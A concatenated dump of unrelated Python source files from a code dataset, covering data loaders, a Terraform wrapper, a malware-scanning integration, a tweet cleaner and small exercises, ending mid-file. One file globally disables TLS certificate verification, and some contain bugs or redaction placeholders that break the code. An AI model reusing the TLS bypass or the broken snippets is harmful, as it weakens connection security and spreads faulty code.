id stringlengths 1 265 | text stringlengths 6 5.19M | dataset_id stringclasses 7
values |
|---|---|---|
133903 | # Copyright 2019 NEC Corporation
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
"""
[概要]
運用基盤連携処理
[引数]
HTTPリクエスト
[戻り値]
HTTPレスポンス
"""
import json
import traceback
import requests
import urllib3
import ssl
import pika
import multiprocessing
from urllib3.exceptions import InsecureRequestWarning
from django.conf import settings
from django.urls import reverse
from libs.commonlibs.oase_logger import OaseLogger
from libs.backyardlibs.monitoring_adapter.oase_monitoring_adapter_common_libs import _produce
from libs.backyardlibs.monitoring_adapter.oase_monitoring_adapter_common_libs import _rabbitMQ_conf
from libs.webcommonlibs.events_request import EventsRequestCommon
urllib3.disable_warnings(InsecureRequestWarning)
ssl._create_default_https_context = ssl._create_unverified_context
logger = OaseLogger.get_instance()
# 設定情報読み込み
_mq_settings = None
# RabbitMQ接続
_channel = None
_connection = None
_properties = None
mq_lock = multiprocessing.Lock()
def send_request(request_data_dic):
"""
[メソッド概要]
一括用に整形済データをリクエストに投げる
"""
logger.logic_log('LOSI00001', 'request_data_dic: %s' % len(request_data_dic))
result = True
msg = ''
trace_id_list = []
data_count = 0
try:
data_count = len(request_data_dic['request'])
# リクエストデータの有無確認
if data_count <= 0:
result = False
logger.system_log('LOSM30011')
raise
trace_id_list = EventsRequestCommon.generate_trace_id(req=data_count)
if data_count != len(trace_id_list):
result = False
logger.system_log('LOSM30028')
raise
for i, data in enumerate(request_data_dic['request']):
data['traceid'] = trace_id_list[i]
data = json.dumps(data)
_rabbitMQ_conf()
# RabbitMQへ送信
mq_lock.acquire()
_produce(data)
mq_lock.release()
except Exception as e:
if result:
result = False
logger.system_log('LOSM30010', traceback.format_exc())
logger.logic_log('LOSI00002', 'result: %s' % (result))
return result
| StarcoderdataPython |
3281224 | <gh_stars>1-10
def fill_matrix(matrix1,matrix2):
q = 0
matrix_res = []
for i in range(len(matrix1)):
matrix_res.append([])
for z in range(len(matrix1[i])):
matrix_res[i].append(0)
while q < len(matrix1):
matrix_res[i][z] += matrix1[i][q] * matrix2[q][z]
q += 1
q = 0
return matrix_res
def print_cool_matrix(matrix_res):
for i in range(len(matrix_res)):
for z in range(len(matrix_res[i])):
matrix_res[i][z] = str(matrix_res[i][z])
print "\t".join(matrix_res[i])
A = [[2,4],
[3,1]]
B = [[2,1],
[1,3]]
C = fill_matrix(A,B)
print_cool_matrix(C)
| StarcoderdataPython |
1743212 | <gh_stars>1-10
import pandas as pd
import re
from .constants import *
import logging
_log = logging.getLogger(__name__)
_OXFORD_PATH = 'https://oxcgrtportal.azurewebsites.net/api/CSVDownload'
COLUMN_NAMES = {
'School closing': 'npi_school_closing',
'Workplace closing': 'npi_workplace_closing',
'Cancel public events': 'npi_cancel_public_events',
'Restrictions on gatherings': 'npi_gatherings_restrictions',
'Close public transport': 'npi_close_public_transport',
'Stay at home requirements': 'npi_stay_at_home',
'Restrictions on internal movement': 'npi_internal_movement_restrictions',
'International travel controls': 'npi_international_travel_controls',
'Income support': 'npi_income_support',
'Debt/contract relief': 'npi_debt_relief',
'Fiscal measures': 'npi_fiscal_measures',
'International support': 'npi_international_support',
'Public information campaigns': 'npi_public_information',
'Testing policy': 'npi_testing_policy',
'Contact tracing': 'npi_contact_tracing',
'Emergency investment in healthcare': 'npi_healthcare_investment',
'Investment in vaccines': 'npi_vaccine_investment',
'StringencyIndex': 'npi_stringency_index'
}
def _load_dataset() -> pd.DataFrame:
_log.info(f'Loading dataset from {_OXFORD_PATH}')
oxford_df = pd.read_csv(_OXFORD_PATH)
oxford_df[DATE_COLUMN_NAME] = pd.to_datetime(oxford_df.Date.astype(str))
df = oxford_df[[c for c in oxford_df.columns if 'Notes' not in c and 'Flag' not in c and 'Unnamed' not in c]].drop(['Date', 'StringencyIndexForDisplay', 'M1_Wildcard'], axis='columns')
df = df.rename(columns={'CountryCode': ISO_COLUMN_NAME})
regex = re.compile(r"[C|H|E](\d)*_")
df = df.rename(columns={c: regex.sub('', c) for c in df.columns})
_log.info("Loaded")
return df.rename(columns=COLUMN_NAMES)
class OxfordGovernmentPolicyDataset:
"""
Oxford COVID-19 government policy dataset
"""
data = None
def __init__(self, force_load=False):
"""
Loads the dataset and stores it in memory.
Further instances of this class will reuse the same data
:param force_load: If true, forces download of the dataset, even if it was loaded already
"""
# This is to make sure we only load the dataset once during a single session
if OxfordGovernmentPolicyDataset.data is None or force_load:
OxfordGovernmentPolicyDataset.data = _load_dataset()
def get_data(self) -> pd.DataFrame:
"""
Returns the dataset as Pandas dataframe
"""
return OxfordGovernmentPolicyDataset.data
def get_country_data(self, country_or_iso) -> pd.DataFrame:
"""
Returns the dataset for a country as Pandas dataframe
:param country_or_iso: Name or ISO code of the country
"""
return self.data.query(f'CountryName == "{country_or_iso}" or ISO == "{country_or_iso}"')
def get_country_policy_changes(self, country_or_iso) -> pd.DataFrame:
"""
Policy changes for a given country
:param country_or_iso: Name or ISO code of the country
:returns: Pandas dataframe of policy changes
"""
country_df = self.get_country_data(country_or_iso)
country_df = country_df.set_index(DATE_COLUMN_NAME)
country_df = country_df.drop(['ConfirmedCases', 'ConfirmedDeaths'], axis='columns')
policy_changes = ((country_df != country_df.shift(1)) & ~country_df.isna()).iloc[1:]
return policy_changes
| StarcoderdataPython |
3256838 | <gh_stars>0
from datetime import datetime
from dateutil.tz import tzlocal
import json
import logging
import re
from urllib import urlencode
from urllib2 import urlopen
DATETIME_REGEX = re.compile('\D*(\d+)\D*')
logger = logging.getLogger(__name__)
class ODataReader(object):
"""A simple OData reader that is capable of filtering and pagination."""
def __init__(self, service_url):
self.service_url = service_url
def get(self, endpoint, params={}):
"""
Get data from the given service and endpoint.
"""
params.update({ '$format': 'json' })
url = self.service_url + endpoint + '?' + urlencode(params)
return self.get_url(url)
def get_url(self, url):
while True:
# load this url and return results
logger.debug('About to load OData source from url %s' % url)
attempts = 0
while attempts < 5:
attempts += 1
try:
logger.debug('Attempt #%d to load url %s' %
(attempts, url))
response = json.load(urlopen(url))
break
except Exception:
# Don't bother with looking at HTTP error code: some
# services have returned 500 once, then responded
# successfully after
logger.exception('Exception while loading url: %s' % url)
if not response:
logger.warn('No response after %d attempts' % attempts)
raise StopIteration
for result in response['d']['results']:
yield result
# try to load next url for pagination
try:
url = response['d']['__next']
url += '&' + urlencode({ '$format': 'json' })
except KeyError:
raise StopIteration
@classmethod
def parse_datetime(cls, timestamp):
"""Parse a datetime from an OData feed."""
if not timestamp: return None
timestamp = re.match(DATETIME_REGEX, timestamp).group(1)
return datetime.fromtimestamp(float(timestamp[:-3]), tzlocal())
@classmethod
def format_datetime(cls, dt):
"""Format a datetime into a form recognized in OData filters."""
return "DateTime'%s'" % datetime.isoformat(dt.replace(microsecond=0))
| StarcoderdataPython |
56916 | #!/usr/bin/env python3
# vim: set ft=python:sw=4:ts=4
import os
import sys
# This location is set within the Dockerfile.
sys.path.insert(0, '/opt/infra/lib')
from infra import (
load_definitions_file,
parse_args,
get_org_repo,
cleanup_boilerplate,
write_tf_backend_file,
write_tfvars_file,
run_terraform,
save_outputs,
write_awstf_file,
)
if __name__ == '__main__':
# TODO: Ensure the AWS envvars are set
GLOBALS, SECTIONS = load_definitions_file()
args = parse_args(
legal_sections=SECTIONS.keys(),
)
# TODO: Handle the None,None and the x,'' cases
org, repo = get_org_repo()
# Set ourselves in the right directory. This simplifies the rest of the code
# The directory is either specified in the SECTIONS definition or defaults
# to the section name.
os.chdir(SECTIONS[args.section].get('subdir', args.section))
cleanup_boilerplate()
# There are a very few cases where we don't want to write a TF backend file.
# Specifically, when we're creating the TF backend in the first place.
if not args.no_backend:
write_tf_backend_file(
region=GLOBALS['region'],
bucket=GLOBALS['backend']['bucket_name'],
dynamodb_table=GLOBALS['backend']['dynamodb_table'],
org=org,
repo=repo,
environment=args.environment,
section=args.section,
)
section_values = SECTIONS.get(args.section, {}).get('inputs', {})
tfvars_filename = write_tfvars_file(
GLOBALS=GLOBALS,
# These are the values that all sections must handle
global_values={
"environment": args.environment,
# This will be used by the boilerplate aws.tf file
"region": section_values.get('region', GLOBALS['region']),
},
section_values=section_values,
org=org,
repo=repo,
environment=args.environment,
)
write_awstf_file()
# TODO: Generate the boilerplate aws.tf file with the region variable
# The output subcommand's STDOUT needs to be parseable as JSON.
suppress_verbiage = False
if args.subcmd == 'output':
suppress_verbiage = True
# Always run "terraform init". This is safe.
run_terraform('init',
reconfigure=args.reconfigure,
tfvars_filename=tfvars_filename,
suppress_verbiage=suppress_verbiage,
)
options = []
suppress_input = True
# Force -auto-approve otherwise terraform apply/destroy will error out.
if args.subcmd == 'apply':
options.append('-auto-approve')
elif args.subcmd == 'destroy':
options.append('-auto-approve')
elif args.subcmd == 'output':
# The output subcommand cannot handle the -var-file parameter.
tfvars_filename = None
suppress_input = False
# Always display outputs in JSON
options.append('-json')
# Run the command we were asked to run.
rv = run_terraform(args.subcmd,
options=options,
suppress_input=suppress_input,
tfvars_filename=tfvars_filename,
suppress_verbiage=suppress_verbiage,
)
# TODO: Do something here with rv - it's a CompletedProcess object
# q.v. https://docs.python.org/3/library/subprocess.html#subprocess.CompletedProcess
# TODO: Add a remove_outputs() to be called when destroying
# TODO: Add a read_outputs() to be used when reading
if args.subcmd == 'apply':
save_outputs(
bucket=GLOBALS['backend']['bucket_name'],
org=org,
repo=repo,
environment=args.environment,
section=args.section,
)
cleanup_boilerplate()
# Scripts should be clear when they succeed. A visual statement is helpful.
if not suppress_verbiage:
print("Ok", flush=True)
| StarcoderdataPython |
3343922 | <reponame>ceprio/xl_vb2py
import math, time
def getLatLong():
"Returns URL for day/night picture"
# Define some 'constants'
ClientRecieveTime=time.time() * 1000
# QueryTimeZone = 10
QueryTimeZone = -time.timezone/3600
QueryTimeZoneOffsetMin = QueryTimeZone * 60
NISTSendTimeGMTms = ClientRecieveTime - ( QueryTimeZoneOffsetMin * 60 * 1000 )
# NIST start time in the query time zone
QueryTimeZoneOffset = ( QueryTimeZoneOffsetMin * 60 * 1000 )
# Replace this with "QueryTimeZoneOffset = ( -time.timezone * 60 * 1000 )"
# Client start time in some time zone
ClientRecieveTimems = ClientRecieveTime
# what timezone does your computer think it is? - in minutes
ClientTimeZone = QueryTimeZoneOffsetMin;
ClientNISTDelta = math.floor(NISTSendTimeGMTms - ClientRecieveTimems)
currTime = ClientRecieveTime + ClientNISTDelta # ThisMilliseconds
gmtTime = time.gmtime()
ssue = currTime / 1000
TwoPi = 2 * math.pi
EpochStart = 631065600
DaysSinceEpoch = (ssue - EpochStart)/ (24*3600)
RadsPerDay = TwoPi / 365.242191
Epsilon_g = 279.403303 * (TwoPi / 360)
OmegaBar_g = 282.768422 * (TwoPi / 360)
Eccentricity = 0.016713
MeanObliquity = 23.440592 * (TwoPi / 360);
# Calculate sun_ecliptic_longitude
N = RadsPerDay * DaysSinceEpoch
N = N % TwoPi
if N < 0:
N += TwoPi # This should never be executed, but never mind
M_Sun = N + Epsilon_g - OmegaBar_g
if M_Sun < 0:
M_Sun += TwoPi # This should never be executed either
# Now we solve keplers equation. For those who are interested keplers
# equation is all about plotting the orbit of an object on the
# elliptic plane.
E = M_Sun
while 1:
delta = E - (Eccentricity*math.sin(E)) - M_Sun
if (abs(delta) <= 1E-10):
break
E -= delta / (1 - (Eccentricity*math.cos(E)))
# End of the keplers equation solution
myLambda = OmegaBar_g + (2 * math.atan(math.sqrt((1+Eccentricity) / (1-Eccentricity)) * math.tan(E/2)))
# There, finished calculating the sun ecliptic longitude
# Now we calculate the ecliptic to equatorial (something or other)
sin_e = math.sin(MeanObliquity)
cos_e = math.cos(MeanObliquity)
alpha = math.atan2(math.sin(myLambda)*cos_e, math.cos(myLambda))
delta = math.asin(sin_e*math.sin(myLambda));
# End of ecliptic to equatorial
# We calculate the Julian date here, Python could probably do this better
# I leave it to the casual observer to replace the following few lines
y = gmtTime[0] # Year
m = gmtTime[1] # Month number
z = gmtTime[2] # Day number
A = y / 100
B = 2 - A + (A/4)
C = 365.25 * y
D = 30.6001 * (m+1)
JD = B + C + D + z + 1720994.5
T = (JD - 2451545) / 36525
T0 = ((((T + 2.5862E-5) * T) + 2400.051336) * T) + 6.697374558
T0 = T0 % 24
if T0 < 0:
T0 += 24
UT = (float(gmtTime[3])) + ((float(gmtTime[4]) + (float(gmtTime[5]) / 60)) / 60)
T0 += UT * 1.002737909
T0 = T0 % 24
if T0 < 0:
T0 += 24
tmp = alpha - ((TwoPi/24)*T0);
while tmp < -math.pi:
tmp += TwoPi
while tmp > math.pi:
tmp -= TwoPi
# Now calculate our longitude and latitude
lon = tmp * (360/TwoPi)
lat = delta * (360/TwoPi)
# Generate the path of the appropriate xearth image
lon = round(lon)
if (lon % 2 != 0):
if (lon > 0):
lon -= 1
else:
lon += 1
lon = round(lon/2) * 2
if lon <= -181:
lon = -180
if lon >= 181:
lon = 180
# lat is odd
lat = round(lat)
if (lat % 2 == 0):
if lat > 0:
lat -= 1
else:
lat += 1
# Need to do different calculations for negative and positive values of lat
# to emulate the way javascript handles rounding
if lat < 0:
lat = (round(int(lat/2) - 1) * 2) + 1
else:
lat = (round(lat/2 - 1) * 2) + 1
if lat <= -24:
lat = -23
if lat >= 24:
lat = 23
if lat < 0:
latStr = str(int(-lat)) + "S"
else:
latStr = str(int(lat)) + "N"
if lon < 0:
lonStr = str(int(-lon)) + "S"
else:
lonStr = str(int(lon)) + "N"
# url = "http://www.time.gov/" + getLatLong()
# return 'http://www.time.gov/images/xearths/11N/154N.jpg'
return "images/xearths/" + latStr + "/" + lonStr + ".jpg"
| StarcoderdataPython |
199470 | <reponame>diCagri/content
import demistomock as demisto
from CommonServerPython import *
'''IMPORTS'''
import requests
import base64
# disable insecure warnings
requests.packages.urllib3.disable_warnings()
'''INTEGRATION PARAMS'''
API_TOKEN = demisto.params().get('apitoken')
URL_BASE = demisto.params().get('url')
USE_PROXY = demisto.params().get('proxy', False)
UNSECURE = not demisto.params().get('insecure', False)
'''CONSTANTS'''
READ_BINARY_MODE = 'rb'
SLASH = '/'
SCAN_FILE_URL = 'direct/scan/file/'
GET_FILE_VERDICT_URL = 'direct/verdict/?hash={}'
TOKEN_PREFIX = 'Bearer' # guard<PASSWORD>-line
RESPONSE_CODE_OK = 200
STATUS_IN_PROGRESS = 'IN_PROGRESS'
STATUS_DONE = 'DONE'
AUTH_HEADERS = {
'Authorization': "{} {}".format(TOKEN_PREFIX, API_TOKEN)
}
VERDICT_SCANNING = 'Scanning'
VERDICT_MALICIOUS = 'Malicious'
VERDICT_APPROVED = 'Approved'
VERDICT_ERROR = 'Error'
VERDICT_BENIGN = 'Benign'
VERDICT_TIMEOUT = 'Timeout'
SCAN_ONGOING = 'Still scanning...'
BITDAM_COMMAND_PREFIX = 'bitdam'
DBOTSCORE_UNKNOWN = 0
DBOTSCORE_CLEAN = 1
DBOTSCORE_MALICIOUS = 3
'''HANDLE PROXY'''
handle_proxy()
'''HELPER FUNCTIONS'''
def get_file_bytes(entry_id):
get_file_path_res = demisto.getFilePath(entry_id)
file_path = get_file_path_res["path"]
with open(file_path, READ_BINARY_MODE) as fopen:
bytes = fopen.read()
return base64.b64encode(bytes)
def get_url_base_with_trailing_slash():
'''
Returns the intergation's base url parameter, making sure it contains an trailing slash
'''
url_base = URL_BASE
return url_base if url_base.endswith(SLASH) else url_base + SLASH
def build_json_response(content, context, human_readable):
return {
'Type': entryTypes['note'],
'ContentsFormat': formats['json'],
'Contents': content,
'ReadableContentsFormat': formats['markdown'],
'HumanReadable': tableToMarkdown(human_readable, content),
'EntryContext': context
}
def get_file_name(entry_id):
get_file_path_res = demisto.getFilePath(entry_id)
return get_file_path_res["name"]
def verdict_to_dbotscore(verdict):
if VERDICT_APPROVED == verdict:
return DBOTSCORE_CLEAN
elif VERDICT_MALICIOUS == verdict:
return DBOTSCORE_MALICIOUS
elif VERDICT_SCANNING == verdict:
return DBOTSCORE_UNKNOWN
else:
return DBOTSCORE_UNKNOWN
'''API_IMPL'''
def scan_file():
response = scan_file_command()
returned_sha1 = parse_scan_file_response(response)
# Build demisto reponse
response_content = {'SHA1': returned_sha1}
response_context = {'BitDam': {'FileScan': {'SHA1': returned_sha1}}}
return build_json_response(response_content, response_context, "File was submitted successfully")
def scan_file_command():
# Get data to build the request
entry_id = demisto.args().get('entryId')
file_name = get_file_name(entry_id)
file_bytes = get_file_bytes(entry_id)
json_data = {'file_name': file_name,
'file_data_base64': base64.b64encode(file_bytes)}
raw_json = json.dumps(json_data, ensure_ascii=False)
url = "{}{}".format(get_url_base_with_trailing_slash(), SCAN_FILE_URL)
# Send the HTTP request
response = requests.post(url, data=raw_json, headers=AUTH_HEADERS, verify=UNSECURE)
return response
def parse_scan_file_response(response):
# Parse response
if RESPONSE_CODE_OK != response.status_code:
raise Exception("Scan file failed. Response code -{}, Data- '{}'".format(str(response.status_code), response.content))
response_json = json.loads(response.content)
if 'sha1' not in response_json:
raise Exception(
"Scan file failed. Bad response json - {}".format(response.content))
returned_sha1 = response_json['sha1']
return returned_sha1
def get_file_verdict():
identifier_value = demisto.args().get('idValue')
response = get_file_verdict_command(identifier_value)
verdict, status = parse_get_file_verdict_response(response)
response_content = {'STATUS': status,
'VERDICT': verdict,
'ID': identifier_value}
context = {}
context['BitDam.Analysis(val.ID && val.ID == obj.ID)'] = {
'Status': status,
'Verdict': verdict,
'ID': identifier_value
}
if VERDICT_MALICIOUS == verdict:
context[outputPaths['file']] = {'SHA1': identifier_value}
context[outputPaths['file']]['Malicious'] = {
'Vendor': 'BitDam',
'Description': 'Process whitelist inconsistency by bitdam-get-file-verdict',
'Name': identifier_value
}
dbotscore = verdict_to_dbotscore(verdict)
if dbotscore:
context[outputPaths['dbotscore']] = {
'Indicator': identifier_value,
'Type': 'File',
'Vendor': 'BitDam',
'Score': dbotscore
}
response_context = context
return build_json_response(response_content, response_context,
"Get file verdict was performed successfully")
def parse_get_file_verdict_response(response):
# Parse results
if RESPONSE_CODE_OK != response.status_code:
raise Exception("Get file verdict failed. Response code -{}, Data- '{}'".format(str(response.status_code),
response.content))
response_json = json.loads(response.content)
status = ''
verdict = ''
if 'scan_data' not in response_json or 'verdict' not in response_json['scan_data']:
raise Exception("Get file verdict failed. Unknown response schema. Data- '{}'".format(response.content))
verdict = response_json['scan_data']['verdict']
if verdict == SCAN_ONGOING or verdict == VERDICT_SCANNING:
# Still in progress
verdict = VERDICT_SCANNING
status = STATUS_IN_PROGRESS
else:
status = STATUS_DONE
return verdict, status
def get_file_verdict_command(identifier_value):
# Get data to build the request
scan_file_relative_url_formatted = GET_FILE_VERDICT_URL.format(identifier_value)
url = "{}{}".format(get_url_base_with_trailing_slash(), scan_file_relative_url_formatted)
# Send the request
response = requests.get(url, headers=AUTH_HEADERS, verify=UNSECURE)
return response
def upload_test_file_to_scan():
d = {
"file_name": "demisto.txt",
"file_data_base64": 'ZGVtaXN0bw=='
}
url = "{}{}".format(get_url_base_with_trailing_slash(), SCAN_FILE_URL)
response = requests.post(url, headers=AUTH_HEADERS, json=d, verify=UNSECURE)
return response
def test_module():
response = upload_test_file_to_scan()
if RESPONSE_CODE_OK == response.status_code:
return True
raise Exception("Status code - {}, Error- '{}'".format(str(response.status_code),
response.content))
'''COMMAND_CLASIFIER'''
try:
if demisto.command() == 'test-module':
# This is the call made when pressing the integration test button.
if test_module():
demisto.results('ok')
sys.exit(0)
elif demisto.command() == 'bitdam-upload-file':
demisto.results(scan_file())
elif demisto.command() == 'bitdam-get-verdict':
demisto.results(get_file_verdict())
except Exception as e:
LOG(e)
return_error("Error: {}".format(str(e)))
| StarcoderdataPython |
19330 | <filename>site_crawler/cleaner/cleaner.py<gh_stars>10-100
import csv
import re
import string
import html
class Cleaner:
def __init__(self):
self.remove_punctuations = str.maketrans('', '', string.punctuation)
def read_csv(self,csv_name):
cleaned_text = []
with open('../data/twitter_data/raw_data/'+csv_name+'.csv', newline='', encoding='utf-8') as csvfile:
reader = csv.DictReader(csvfile)
for row in reader:
text = row['text']
clean_text = self.clean_tweets(text)
cleaned_text.append(clean_text)
self.save_cleaned_csv('cleaned_'+csv_name,cleaned_text)
def clean_tweets(self,tweet):
# harmonize the cases
lower_case_text = tweet.lower()
# remove urls
removed_url = re.sub(r'http\S+', '', lower_case_text)
# remove hashtags
removed_hash_tag = re.sub(r'#\w*', '', removed_url) # hastag
# remove usernames from tweets
removed_username = re.sub(r'@\w*\s?','',removed_hash_tag)
# removed retweets
removed_retweet = removed_username.replace("rt", "", True) # remove to retweet
# removing punctuations
removed_punctuation = removed_retweet.translate(self.remove_punctuations)
# remove spaces
remove_g_t = removed_punctuation.replace(">", "", True)
remove_a_m_p = remove_g_t.replace("&", "", True)
final_text = remove_a_m_p
return final_text
def pre_cleaning(self,text):
html_escaped = html.unescape(text)
final_text = html_escaped.replace(';','')
return final_text
def pre_labeling(self,text):
lower_case_text = text.lower()
removed_url = re.sub(r'http\S+', '', lower_case_text)
return removed_url
def save_cleaned_csv(self,name,tweets_list):
with open('../data/twitter_data/cleaned_data/' + name + '.csv', 'w') as f:
writer = csv.writer(f)
writer.writerow(["text"])
for tweet in tweets_list:
writer.writerow([tweet,])
pass
def save_pre_labled_csv(self,csv_name):
cleaned_text = []
with open('../data/twitter_data/raw_data/' + csv_name + '.csv', newline='', encoding='utf-8') as csvfile:
reader = csv.DictReader(csvfile)
for row in reader:
text = row['text']
clean_text = self.pre_labeling(text)
cleaned_text.append(clean_text)
self.save_pre_labeled_csv('unlabeled_' + csv_name, cleaned_text)
def save_pre_labeled_csv(self,name,tweets_list):
with open('../data/twitter_data/pre_labeled/' + name + '.csv', 'w') as f:
writer = csv.writer(f)
writer.writerow(["text","label"])
for tweet in tweets_list:
writer.writerow([tweet,])
pass
if __name__ == "__main__":
c = Cleaner()
tweets_csvs = [
'Business_KE',
'MadeItInAfrica',
'IFCAfrica',
'africareview',
'AfDB_Group',
'_AfricanUnion',
'Taifa_Leo',
'BD_Africa',
'RadioCitizenFM',
'citizentvkenya',
'KTNKenya',
'K24Tv',
'StandardKenya',
'TheStarKenya',
'radiomaisha',
'KBCChannel1',
'CapitalFMKenya',
'African_Markets',
'Africafinancial',
'InvestInAfrica',
'AfricanInvestor',
'forbesafrica',
'cnbcafrica',
'BBCAfrica',
'CNNAfrica',
'allafrica',
'ReutersAfrica',
'VenturesAfrica',
'BBGAfrica',
'GhettoRadio895',
'kenyanwalstreet',
'SokoAnalyst',
'NSEKenya',
'wazua'
]
for tweets_csv in tweets_csvs:
c.save_pre_labled_csv(tweets_csv)
| StarcoderdataPython |
3233516 | <filename>pandas1 - Introduction to Pandas/pandas2 - DataFrame Structure.py<gh_stars>0
# -*- coding: utf-8 -*-
"""
Created on Tue May 16 15:58:26 2017
@author: azkei
The DataFrame is a tabular data structure similar to the spreadsheet.
This data structure is designed to extend the case of the Series to multiple dimensions.
The DataFrame consists of an ordered collection of columns each of which can
contain value of diferent types (numeric,string,boolean,etc) and an index
"""
# 1. Defining a DataFrame
# Here we are defining the column and the values on the column
data = {'color':['blue','green','yellow','red','white'],
'object':['ball','pen','pencil','paper','mug'],
'price':['1.2','1.3','1.4','1.5','1.6']}
frame = pd.DataFrame(data)
frame
# If the data contains more data than we are interested, we can make a selection
frame2 = pd.DataFrame(data, columns = ['object','price'])
frame2
# Specifying the index on the DataFrame - or else it will be numerical type
frame2 = pd.DataFrame(data,index=['one','two','three','four','five'])
frame2
# Generating numbers into DataFrames, assigning the index and columns
frame3 = pd.DataFrame(np.arange(16).reshape((4,4)),
index = ['red','blue','yellow','white'],
columns = ['ball','pen','pencil','paper'])
frame3
# 2. Selecting Elements
# If we want to know the names of the columns
frame.columns
# If we want to get the indexes
frame.index
# Regarding the values contained within the data structure,
# we can get the entire set of data using the values attribute
frame.values
# If we want to select the values in the column
frame['price']
# As you can see, the return value is a Series object.
# Another way is to use the column name as an attribute of the instance of the
# DataFrame
frame.price
# If we want to extract the rows of the dataframe,
# pass in the index in ix() function
frame.ix[2]
# To select multiple rows - specify more index values
frame.ix[[2,4,1,3]]
# Extracting a portion from a DataFrame
frame[0:1]
frame[1:3]
# Achieving a single value in a DataFrame - use name of column and index of row
frame['object'][3]
# 3. Assigning Values
# Giving the index a name
# Giving the columns names an index name
frame.index.name = 'id'; frame.columns.name = 'item'
frame
# Adding new column in the DataFrame
frame['new'] = 12
frame
# Updating the new column contents
frame['new'] = [3.0, 1.3, 2.2, 0.8, 1.1]
frame
# Adding a Series of random numbers as a column into a DataFrame
# Generating Series
ser = pd.Series(np.arange(5))
ser
# Adding the Series into the frame column
frame['new'] = ser
frame
# Changing single value, select item and assign new value
frame['price'][2] = 3.3
# 4. Membership of a Value
# Check if these values are in the DataFrame
# True/False
frame.isin([1.5,'pen'])
# Nan
frame[frame.isin([1.0,'pen'])]
# 5. Deleting a Column
del frame['new']
frame
# 5. Filtering
# Return values less than 12
frame[frame < 12]
# 6. DataFrame from Nested Dict
# Generate Nested Dictionary
nestdict = {'red':{ 2012: 22, 2013: 33},
'white':{2011: 13, 2012: 22, 2013:16},
'blue':{2011:17, 2012:27, 2013:18}}
# Place nested dictionary into DataFrame
frame2 = pd.DataFrame(nestdict)
# As you can see Pandas is able to compensate for missing data
# 7. Transposition of a DataFrame
# Columms become rows, rows become columns
frame2.T | StarcoderdataPython |
1778011 | import numpy as np
from scipy.stats import cauchy
import matplotlib.pyplot as plt
n = 1000
distribution = cauchy()
fig, ax = plt.subplots()
data = distribution.rvs(n)
if 0:
ax.plot(list(range(n)), data, 'bo', alpha=0.5)
ax.vlines(list(range(n)), 0, data, lw=0.2)
ax.set_title("{} observations from the Cauchy distribution".format(n))
if 1:
# == Compute sample mean at each n == #
sample_mean = np.empty(n)
for i in range(n):
sample_mean[i] = np.mean(data[:i])
# == Plot == #
ax.plot(list(range(n)), sample_mean, 'r-', lw=3, alpha=0.6,
label=r'$\bar X_n$')
ax.plot(list(range(n)), [0] * n, 'k--', lw=0.5)
ax.legend()
fig.show()
| StarcoderdataPython |
3230375 | <gh_stars>0
# Copyright 2016 OpenStack Foundation
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
#
"""nsxv_security_group_logging
Revision ID: <PASSWORD>
Revises: <PASSWORD>
Create Date: 2016-03-24 06:06:06.680092
"""
from alembic import op
import sqlalchemy as sa
# revision identifiers, used by Alembic.
revision = '5ed1ffbc<PASSWORD>a'
down_revision = '3c88bdea3054'
depends_on = ('3e4dccfe6fb4',)
def upgrade():
secgroup_prop_table = sa.Table(
'nsx_extended_security_group_properties',
sa.MetaData(),
sa.Column('security_group_id', sa.String(36), nullable=False),
sa.Column('logging', sa.Boolean(), nullable=False))
op.bulk_insert(secgroup_prop_table, get_values())
op.drop_column('nsxv_security_group_section_mappings', 'logging')
def get_values():
values = []
session = sa.orm.Session(bind=op.get_bind())
section_mapping_table = sa.Table('nsxv_security_group_section_mappings',
sa.MetaData(),
sa.Column('neutron_id', sa.String(36)),
sa.Column('logging', sa.Boolean(),
nullable=False))
secgroup_table = sa.Table('securitygroups',
sa.MetaData(),
sa.Column('id', sa.String(36)))
# If we run NSX-V plugin then we want the current values for security-group
# logging, taken from the section mapping table.
for row in session.query(section_mapping_table).all():
values.append({'security_group_id': row.neutron_id,
'logging': row.logging})
# If we run NSX-V3 plugin then previous table is empty, since
# security-group logging isn't supported on previous versions, we set the
# current value to false (the default).
if not values:
for row in session.query(secgroup_table).all():
values.append({'security_group_id': row.id,
'logging': False})
session.commit()
return values
| StarcoderdataPython |
129840 | from copy import deepcopy
def get_median(values):
"""
Given an unsorted list of numeric values, return median value (as a float).
Note that in the case of even-length lists of values, we apply the value to
the left of the center to be the median (such that the median can only be
a value from the list of values).
Eg: get_median([1,2,3,4]) == 2, not 2.5.
"""
if not values:
raise Exception("Cannot calculate median of list with no values!")
sorted_values = deepcopy(values)
sorted_values.sort() # Not calling `sorted` b/c `sorted_values` may not be list.
if len(values) % 2 == 0:
return sorted_values[len(values)/2-1]
else:
return sorted_values[len(values)/2]
def test():
test_median()
def test_median():
feature_values = [4,1,3,2]
correct_median = 2
print ("median value is correct?", get_median(feature_values) == correct_median)
if __name__=="__main__":
test()
| StarcoderdataPython |
3386235 | print("Hey Nigga! \n welcome to tic tac toe")
print("who do you want to play with?\n")
mode=str(input("type - 'Human' or 'computer'\n ").upper())
def HumanvsHuman():
theBoard = {"1": '1', "2": '2', "3": '3',
"4": '4', "5": '5', "6": '6',
"7": '7', "8": '8', "9": '9'}
print("Now playing HUMAN vs HUMAN Tic Tac Toe")
def gamecheck(count):
if count < 5:
if theBoard['7'] == theBoard['8'] == theBoard['9'] != ' ': # across the top
a = theBoard['7']
print("\nGame Over.\n")
print(" **** " + a + " won. ****")
playAgain()
elif theBoard['4'] == theBoard['5'] == theBoard['6'] != ' ': # across the middle
b = theBoard['4']
print("\nGame Over.\n")
print(" **** " + b + " won. ****")
playAgain()
elif theBoard['1'] == theBoard['2'] == theBoard['3'] != ' ': # across the bottom
c = theBoard['1']
print("\nGame Over.\n")
print(" **** " + c + " won. ****")
